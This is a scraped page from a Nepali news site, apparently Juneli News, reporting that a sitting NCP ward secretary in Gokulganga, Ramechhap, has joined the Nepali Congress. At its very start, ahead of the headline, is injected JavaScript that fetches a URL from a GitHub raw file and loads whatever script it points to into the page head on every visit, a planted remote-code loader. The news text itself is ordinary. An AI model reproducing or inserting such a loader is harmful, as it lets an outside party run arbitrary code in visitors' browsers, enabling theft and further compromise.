;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); फर्पुका नेकपाका वहालवाला सचिवनै कांग्रेसमा प्रवेश – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • फर्पुका नेकपाका वहालवाला सचिवनै कांग्रेसमा प्रवेश
देश/प्रदेश

फर्पुका नेकपाका वहालवाला सचिवनै कांग्रेसमा प्रवेश

फागुन १५,

रामेछाप । नेपाल कम्युनिष्ट पार्टी (नेकपा) गोकुलगंगा गाउँपालिका वडा नं ६ फर्पुका बहालवाला सचिवनै कांग्रेसमा प्रवेश गरेका छन् । नेकपाले जनतालाई धोका दिएको र राष्ट्रघाती पार्टी भएको थाहा पाएकाले आफू कांग्रेस प्रवेश गरेको सिताराम खड्काले बताए । उनले जनताको पार्टी भनेको कांग्रेस मात्रै हुने उनले जिकिर गरे ।

कांग्रेस रामेछापको पार्टी कार्यालय, रामेछापमा केन्द्रीय सदस्य युवा नेता प्रदिप पौडेलले उनलाई पार्टी प्रवेश गराएका छन् । कार्यक्रममा कांग्रेस रामेछापका नेताहरुको सहभागिता रहेको थियो ।

फेसबुक प्रतिक्रियाहरु